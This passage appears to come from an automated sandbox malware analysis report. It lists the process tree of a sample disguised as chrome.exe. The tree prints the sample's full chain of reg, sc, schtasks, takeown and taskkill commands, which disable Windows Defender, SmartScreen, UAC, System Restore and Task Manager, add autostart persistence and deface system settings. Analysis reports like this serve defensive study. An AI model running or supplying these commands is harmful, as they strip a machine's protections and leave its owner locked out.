2036 cmd.exe 97 PID 2036 wrote to memory of 4876 2036 cmd.exe 98 PID 2036 wrote to memory of 4876 2036 cmd.exe 98 PID 2036 wrote to memory of 4856 2036 cmd.exe 99 PID 2036 wrote to memory of 4856 2036 cmd.exe 99 PID 2036 wrote to memory of 5044 2036 cmd.exe 104 PID 2036 wrote to memory of 5044 2036 cmd.exe 104 PID 2036 wrote to memory of 5036 2036 cmd.exe 105 PID 2036 wrote to memory of 5036 2036 cmd.exe 105 PID 2036 wrote to memory of 5100 2036 cmd.exe 106 PID 2036 wrote to memory of 5100 2036 cmd.exe 106 PID 2036 wrote to memory of 5096 2036 cmd.exe 107 PID 2036 wrote to memory of 5096 2036 cmd.exe 107 PID 2036 wrote to memory of 1196 2036 cmd.exe 110 PID 2036 wrote to memory of 1196 2036 cmd.exe 110 PID 2036 wrote to memory of 1984 2036 cmd.exe 111 PID 2036 wrote to memory of 1984 2036 cmd.exe 111 PID 2036 wrote to memory of 3536 2036 cmd.exe 113 PID 2036 wrote to memory of 3536 2036 cmd.exe 113 PID 2036 wrote to memory of 5776 2036 cmd.exe 114 PID 2036 wrote to memory of 5776 2036 cmd.exe 114 PID 2036 wrote to memory of 4488 2036 cmd.exe 116 PID 2036 wrote to memory of 4488 2036 cmd.exe 116 PID 2036 wrote to memory of 5328 2036 cmd.exe 118 PID 2036 wrote to memory of 5328 2036 cmd.exe 118 PID 2036 wrote to memory of 3496 2036 cmd.exe 120 PID 2036 wrote to memory of 3496 2036 cmd.exe 120 PID 2036 wrote to memory of 4052 2036 cmd.exe 121 PID 2036 wrote to memory of 4052 2036 cmd.exe 121 PID 2036 wrote to memory of 5156 2036 cmd.exe 125 PID 2036 wrote to memory of 5156 2036 cmd.exe 125 PID 2036 wrote to memory of 4772 2036 cmd.exe 133 PID 2036 wrote to memory of 4772 2036 cmd.exe 133 PID 2036 wrote to memory of 4152 2036 cmd.exe 134 PID 2036 wrote to memory of 4152 2036 cmd.exe 134 PID 2036 wrote to memory of 2248 2036 cmd.exe 135 PID 2036 wrote to memory of 2248 2036 cmd.exe 135 PID 2036 wrote to memory of 2704 2036 cmd.exe 136 PID 2036 wrote to memory of 2704 2036 cmd.exe 136 PID 2036 wrote to memory of 5312 2036 cmd.exe 137 PID 2036 wrote to memory of 5312 2036 cmd.exe 137 PID 2036 wrote to memory of 6104 2036 cmd.exe 138 PID 2036 wrote to memory of 6104 2036 cmd.exe 138 PID 2036 wrote to memory of 4000 2036 cmd.exe 139 PID 2036 wrote to memory of 4000 2036 cmd.exe 139 PID 2036 wrote to memory of 6048 2036 cmd.exe 140 PID 2036 wrote to memory of 6048 2036 cmd.exe 140 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy WMI provider
The Volume Shadow Copy service is used to manage backups/snapshots.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
-
Views/modifies file attributes 1 TTPs 6 IoCs
pid Process 4996 attrib.exe 4504 attrib.exe 4476 attrib.exe 3796 attrib.exe 456 attrib.exe 1644 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\chrome.exe"C:\Users\Admin\AppData\Local\Temp\chrome.exe"1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2080 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\9C30.tmp\9C31.tmp\9C32.bat C:\Users\Admin\AppData\Local\Temp\chrome.exe"2⤵
- Checks computer location settings
- Drops file in System32 directory
- Drops file in Program Files directory
- Drops file in Windows directory
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of WriteProcessMemory
PID:2036 -
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v sex.exe /d "C:\Windows\System32\sex.exe"3⤵
- Adds Run key to start application
PID:5456
-
-
C:\Windows\system32\reg.exereg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\ /v DisableTaskMgr /t REG_DWORD /f /d 13⤵PID:3584
-
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f3⤵
- UAC bypass
- Modifies registry key
PID:4056
-
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 0 /f3⤵
- UAC bypass
- Modifies registry key
PID:2228
-
-
C:\Windows\system32\reg.exereg add HKLM\System\CurrentControlSet\Control\SafeBoot /v AlternateShell /t REG_SZ /d "C:\Windows\System32\sex.exe" /f3⤵
- Modifies registry key
PID:1268
-
-
C:\Windows\system32\reg.exereg add HKLM\System\CurrentControlSet\Control\ComputerName\ActiveComputerName /v "ComputerName" /t REG_SZ /d "NeoandRedV" /f3⤵
- Modifies registry key
PID:1104
-
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\International" /v "s1159" /t REG_SZ /d "Neo" /f3⤵PID:4808
-
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\International" /v "s2359" /t REG_SZ /d "Red_V" /f3⤵PID:4780
-
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\International" /v "sCountry" /t REG_SZ /d "United Red_V of Neo" /f3⤵PID:4876
-
-
C:\Windows\system32\timeout.exetimeout 3 /nobreak3⤵
- Delays execution with timeout.exe
PID:4856
-
-
C:\Windows\system32\control.execontrol3⤵PID:5044
-
-
C:\Windows\system32\cttune.execttune3⤵PID:5036
-
-
C:\Windows\system32\DisplaySwitch.exedisplayswitch.exe3⤵PID:5100
-
-
C:\Windows\system32\reg.exereg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ /v BatteryFlyout /t REG_DWORD /f /d 03⤵PID:5096
-
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\OEMInformation\ /v HelpCustomized /t REG_DWORD /f /d 13⤵PID:1196
-
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\OEMInformation\ /v Manufacturer /t REG_SZ /f /d "Neo, Red_V"3⤵PID:1984
-
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\OEMInformation\ /v Model /t REG_SZ /f /d "YOU HAVE BEEN FUCKED"3⤵PID:3536
-
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\OEMInformation\ /v SupportHours /t REG_SZ /f /d "NEO"3⤵PID:5776
-
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\OEMInformation\ /v SupportPhone /t REG_SZ /f /d "NEO"3⤵PID:4488
-
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\OEMInformation\ /v SupportURL /t REG_SZ /f /d "http://www.neocorporations.com"3⤵PID:5328
-
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\MTCUVC" /v EnableMtcUvc /t REG_DWORD /f /d 03⤵PID:3496
-
-
C:\Windows\system32\mmc.exe"C:\Windows\system32\mmc.exe" "C:\Windows\system32\devmgmt.msc"3⤵
- Checks SCSI registry key(s)
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:4052
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\bozo.vbs"3⤵PID:5156
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\bozo2.vbs"3⤵PID:4772
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\bozo3.vbs"3⤵PID:4152
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\bozo4.vbs"3⤵PID:2248
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\bozo5.vbs"3⤵PID:2704
-
-
C:\Windows\system32\dxdiag.exedxdiag3⤵PID:5312
-
-
C:\Windows\system32\mmc.exe"C:\Windows\system32\mmc.exe" "C:\Windows\system32\diskmgmt.msc"3⤵
- Suspicious behavior: SetClipboardViewer
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:6104
-
-
C:\Windows\system32\SndVol.exeSndVol.exe3⤵
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:4000
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\player.vbs"3⤵PID:6048
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Microsoft\Windows Defender\Features" /v "TamperProtection" /t REG_DWORD /d "0" /f3⤵PID:3652
-
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Services\SgrmBroker" /v "Start" /t REG_DWORD /d "4" /f3⤵PID:4732
-
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f3⤵
- Modifies Security services
PID:852
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Microsoft\Windows Defender Security Center\Notifications" /v "DisableNotifications" /t REG_DWORD /d "1" /f3⤵
- Modifies Windows Defender notification settings
PID:880
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender Security Center\Notifications" /v "DisableEnhancedNotifications " /t REG_DWORD /d "1" /f3⤵
- Modifies Windows Defender notification settings
PID:5244
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Notifications\Settings\Windows.SystemToast.SecurityAndMaintenance" /v "Enabled" /t REG_DWORD /d "0" /3⤵PID:1048
-
-
C:\Windows\system32\reg.exereg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f3⤵PID:5240
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "AllowFastServiceStartup" /t REG_DWORD /d "0" /f3⤵PID:5144
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f3⤵
- Modifies Windows Defender DisableAntiSpyware settings
PID:1644
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f3⤵PID:220
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableSpecialRunningModes" /t REG_DWORD /d "1" /f3⤵PID:2024
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "ServiceKeepAlive" /t REG_DWORD /d "0" /f3⤵PID:3168
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f3⤵PID:5876
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f3⤵
- Modifies Windows Defender Real-time Protection settings
PID:2956
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f3⤵
- Modifies Windows Defender Real-time Protection settings
PID:4420
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f3⤵
- Modifies Windows Defender Real-time Protection settings
PID:5376
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f3⤵
- Modifies Windows Defender Real-time Protection settings
PID:4496
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRoutinelyTakingAction" /t REG_DWORD /d "1" /f3⤵
- Modifies Windows Defender Real-time Protection settings
PID:4500
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f3⤵
- Modifies Windows Defender Real-time Protection settings
PID:3024
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f3⤵PID:3484
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f3⤵PID:4432
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f3⤵PID:5836
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f3⤵PID:2400
-
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f3⤵PID:972
-
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f3⤵PID:2224
-
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable3⤵PID:2016
-
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable3⤵PID:1284
-
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable3⤵PID:1484
-
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable3⤵PID:5184
-
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable3⤵PID:6056
-
-
C:\Windows\system32\reg.exereg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f3⤵PID:4780
-
-
C:\Windows\system32\reg.exereg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f3⤵PID:4920
-
-
C:\Windows\system32\reg.exereg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f3⤵PID:4956
-
-
C:\Windows\system32\reg.exereg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f3⤵PID:4960
-
-
C:\Windows\system32\reg.exereg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f3⤵PID:4844
-
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f3⤵
- Modifies Security services
PID:2252
-
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Services\MDCoreSvc" /v "Start" /t REG_DWORD /d "4" /f3⤵PID:5096
-
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f3⤵
- Modifies Security services
PID:1196
-
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f3⤵
- Modifies Security services
PID:2440
-
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f3⤵
- Modifies Security services
PID:472
-
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f3⤵
- Modifies security service
PID:4596
-
-
C:\Windows\system32\sc.exesc config webthreatdefsvc start= disabled3⤵
- Launches sc.exe
PID:5024
-
-
C:\Windows\system32\sc.exesc config webthreatdefusersvc start= disabledreg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer" /v "SmartScreenEnabled" /t REG_SZ /d "Off" /f3⤵
- Launches sc.exe
PID:1164
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Edge\SmartScreenEnabled" /ve /t REG_DWORD /d "0" /f3⤵PID:3536
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Edge\SmartScreenPuaEnabled" /ve /t REG_DWORD /d "0" /f3⤵PID:1968
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\AppHost" /v "EnableWebContentEvaluation" /t "REG_DWORD" /d "0" /f3⤵PID:5652
-
-
C:\Windows\system32\takeown.exetakeown /s IQKNFIQH /u Admin /f "C:\Windows\System32\smartscreen.exe"3⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:2320
-
-
C:\Windows\system32\icacls.exeicacls "C:\Windows\System32\smartscreen.exe" /grant:r Admin:F3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:3328
-
-
C:\Windows\system32\taskkill.exetaskkill /im smartscreen.exe /f3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1940
-
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Control\CI\Policy" /v "VerifiedAndReputablePolicyState" /t REG_DWORD /d "0" /f3⤵PID:1156
-
-
C:\Windows\system32\control.execontrol display3⤵PID:648
-
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL display4⤵PID:5272
-
-
-
C:\Windows\system32\control.execontrol3⤵PID:2344
-
-
C:\Windows\system32\control.execontrol system3⤵PID:6036
-
-
C:\Windows\System32\control.exe"C:\Windows\System32\control.exe" "C:\Windows\system32\joy.cpl",3⤵PID:1856
-
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Windows\system32\joy.cpl",4⤵
- Suspicious use of SetWindowsHookEx
PID:3104
-
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im explorer.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2388
-
-
C:\Windows\system32\Fondue.exefondue3⤵PID:3168
-
-
C:\Windows\system32\msconfig.exemsconfig3⤵
- Suspicious use of SetWindowsHookEx
PID:32
-
-
C:\Windows\system32\msinfo32.exemsinfo323⤵
- Enumerates system info in registry
PID:4196
-
-
C:\Windows\system32\OptionalFeatures.exeoptionalfeatures3⤵PID:4420
-
-
C:\Windows\system32\mmc.exe"C:\Windows\system32\mmc.exe" "C:\Windows\system32\services.msc"3⤵
- Suspicious behavior: SetClipboardViewer
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:4496
-
-
C:\Windows\system32\slui.exeslui.exe3⤵PID:4472
-
C:\Windows\system32\slui.exe"C:\Windows\system32\slui.exe" 0x034⤵PID:1464
-
C:\Windows\system32\ChangePk.exe"C:\Windows\system32\ChangePk.exe"5⤵PID:3980
-
-
-
-
C:\Windows\system32\SystemPropertiesAdvanced.exeSystemPropertiesAdvanced3⤵PID:5860
-
-
C:\Windows\system32\SystemPropertiesComputerName.exeSystemPropertiesComputerName3⤵PID:3584
-
-
C:\Windows\system32\SystemPropertiesDataExecutionPrevention.exeSystemPropertiesDataExecutionPrevention3⤵PID:1284
-
-
C:\Windows\system32\SystemPropertiesHardware.exeSystemPropertiesHardware3⤵PID:1268
-
-
C:\Windows\system32\SystemPropertiesPerformance.exeSystemPropertiesPerformance3⤵PID:6056
-
-
C:\Windows\system32\SystemPropertiesProtection.exeSystemPropertiesProtection3⤵PID:4780
-
-
C:\Windows\system32\SystemPropertiesRemote.exeSystemPropertiesRemote3⤵PID:4928
-
-
C:\Windows\system32\mmc.exe"C:\Windows\system32\mmc.exe" "C:\Windows\system32\WF.msc"3⤵
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious behavior: SetClipboardViewer
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:4956
-
-
C:\Windows\system32\mmc.exe"C:\Windows\system32\mmc.exe" "C:\Windows\system32\lusrmgr.msc"3⤵
- Drops file in System32 directory
- Suspicious behavior: SetClipboardViewer
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:4352
-
-
C:\Windows\system32\winver.exewinver3⤵PID:5872
-
-
C:\Windows\System32\control.exe"C:\Windows\System32\control.exe" "C:\Windows\system32\joy.cpl",3⤵PID:2344
-
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Windows\system32\joy.cpl",4⤵
- Suspicious use of SetWindowsHookEx
PID:2128
-
-
-
C:\Windows\System32\control.exe"C:\Windows\System32\control.exe" "C:\Windows\system32\desk.cpl",3⤵PID:1856
-
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Windows\system32\desk.cpl",4⤵
- Checks computer location settings
PID:4396 -
C:\Windows\explorer.exe"C:\Windows\explorer.exe" ms-settings:display5⤵PID:3384
-
-
-
-
C:\Windows\System32\control.exe"C:\Windows\System32\control.exe" "C:\Windows\system32\ncpa.cpl",3⤵PID:4292
-
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Windows\system32\ncpa.cpl",4⤵PID:3796
-
-
-
C:\Windows\System32\control.exe"C:\Windows\System32\control.exe" "C:\Windows\system32\mmsys.cpl",3⤵PID:2108
-
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Windows\system32\mmsys.cpl",4⤵PID:5624
-
-
-
C:\Windows\system32\RecoveryDrive.exeRecoveryDrive.exe3⤵PID:4408
-
-
C:\Windows\system32\reg.exeREG ADD "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v Hidden /t REG_DWORD /d 2 /f3⤵PID:980
-
-
C:\Windows\system32\reg.exeREG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v HideIcons /t REG_DWORD /d 1 /f3⤵PID:4732
-
-
C:\Windows\system32\reg.exeREG ADD "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v HideFileExt /t REG_DWORD /d 1 /f3⤵PID:708
-
-
C:\Windows\system32\reg.exeREG ADD "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v TaskbarNoPinnedList /t REG_DWORD /d 1 /f3⤵PID:2888
-
-
C:\Windows\system32\reg.exeREG ADD "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoPinningToTaskbar /t REG_DWORD /d 1 /f3⤵PID:4700
-
-
C:\Windows\system32\reg.exeREG ADD "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoSetTaskbar /t REG_DWORD /d 1 /f3⤵PID:1312
-
-
C:\Windows\system32\reg.exeREG ADD "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoTrayItemsDisplay /t REG_DWORD /d 1 /f3⤵PID:660
-
-
C:\Windows\system32\reg.exeREG ADD "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoTrayContextMenu /t REG_DWORD /d 1 /f3⤵PID:1012
-
-
C:\Windows\system32\reg.exeREG ADD "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoSaveSettings /t REG_DWORD /d 1 /f3⤵PID:5640
-
-
C:\Windows\system32\reg.exeREG ADD "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableLockWorkstation /t REG_DWORD /d 1 /f3⤵PID:4004
-
-
C:\Windows\system32\reg.exeREG ADD "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f3⤵
- UAC bypass
PID:1644
-
-
C:\Windows\system32\reg.exeREG ADD "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoControlPanel /t REG_DWORD /d 1 /f3⤵PID:5800
-
-
C:\Windows\system32\reg.exeREG ADD "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoStartMenuPinnedList /t REG_DWORD /d 1 /f3⤵PID:2876
-
-
C:\Windows\system32\reg.exeREG ADD "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoStartMenuMFUprogramsList /t REG_DWORD /d 1 /f3⤵PID:5088
-
-
C:\Windows\system32\reg.exeREG ADD "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoStartMenuMorePrograms /t REG_DWORD /d 1 /f3⤵PID:4800
-
-
C:\Windows\system32\reg.exeREG ADD "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v HideFileExt /t REG_DWORD /d 1 /f3⤵PID:2788
-
-
C:\Windows\system32\reg.exeREG ADD "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoFolderOptions /t REG_DWORD /d 1 /f3⤵PID:3884
-
-
C:\Windows\system32\reg.exeREG ADD "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoFileAssociate /t REG_DWORD /d 1 /f3⤵PID:4652
-
-
C:\Windows\system32\reg.exeREG ADD "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoRun /t REG_DWORD /d 1 /f3⤵PID:1500
-
-
C:\Windows\system32\reg.exeREG ADD "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoFind /t REG_DWORD /d 1 /f3⤵PID:3476
-
-
C:\Windows\system32\reg.exeREG ADD "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoSecurityTab /t REG_DWORD /d 1 /f3⤵PID:5568
-
-
C:\Windows\system32\reg.exeREG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoSecurityTab /t REG_DWORD /d 1 /f3⤵PID:1184
-
-
C:\Windows\system32\reg.exeREG ADD "HKCU\Software\Microsoft\Command Processor" /v DisableUNCCheck /t REG_DWORD /d 1 /f3⤵PID:4616
-
-
C:\Windows\system32\reg.exeREG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoViewOnDrive /t REG_DWORD /d 67108863 /f3⤵PID:3828
-
-
C:\Windows\system32\reg.exeREG ADD "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoViewOnDrive /t REG_DWORD /d 67108863 /f3⤵PID:5668
-
-
C:\Windows\system32\reg.exereg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\ /v NoClose /t REG_DWORD /f /d 13⤵PID:5284
-
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\policies\system\ /v legalnoticetext /f /d "ATTENTION!"3⤵PID:3812
-
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\policies\system\ /v legalnoticecaption /f /d "YOU HAVE BEEN SCREWED!"3⤵PID:2824
-
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRestore" /v DisableSR /t REG_DWORD /d 1 /f3⤵PID:3840
-
-
C:\Windows\system32\sc.exesc config VSS start= disabled"3⤵
- Launches sc.exe
PID:3860
-
-
C:\Windows\System32\control.exe"C:\Windows\System32\control.exe" "C:\Windows\system32\sysdm.cpl",3⤵PID:4128
-
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Windows\system32\sysdm.cpl",4⤵PID:3328
-
-
-
C:\Windows\explorer.exeexplorer.exe3⤵
- Boot or Logon Autostart Execution: Active Setup
- Enumerates connected drives
- Checks SCSI registry key(s)
- Modifies registry class
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:3784
-
-
C:\Windows\System32\control.exe"C:\Windows\System32\control.exe" "C:\Windows\system32\timedate.cpl",3⤵PID:3160
-
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Windows\system32\timedate.cpl",4⤵PID:4572
-
-
-
C:\Windows\system32\mmc.exemmc.exe3⤵
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious behavior: SetClipboardViewer
- Suspicious use of SetWindowsHookEx
PID:4164
-
-
C:\Windows\System32\control.exe"C:\Windows\System32\control.exe" "C:\Windows\system32\appwiz.cpl",3⤵PID:4384
-
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Windows\system32\appwiz.cpl",4⤵PID:2340
-
-
